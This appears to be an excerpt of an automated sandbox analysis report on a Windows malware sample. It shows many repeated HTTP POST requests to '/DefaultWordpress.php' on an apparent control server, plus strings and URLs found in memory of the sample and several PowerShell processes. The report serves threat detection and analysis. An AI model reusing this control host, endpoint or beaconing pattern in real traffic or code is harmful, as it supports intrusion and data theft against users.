                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----tvPFcKajitlNWzczXkNzA6CXVW19pPAyeeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2982Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1924Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----MPho9DAeco10vW2pgPLJfMXn3NFOjUpHuhUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2978Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1932Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 733812cm.n9shteam.in
                            Source: unknownHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: qmgr.db.76.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.76.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 0000001C.00000002.2703365536.0000015704276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C734B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F202703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.0000021740B17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019064065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E2C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CF48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.00000120003A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223CA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000001C.00000002.2703365536.0000015704276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C734B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F202703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.0000021740B17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019064065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E2C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CF48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.00000120003A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223CA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: CpvYgJX57w.71.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
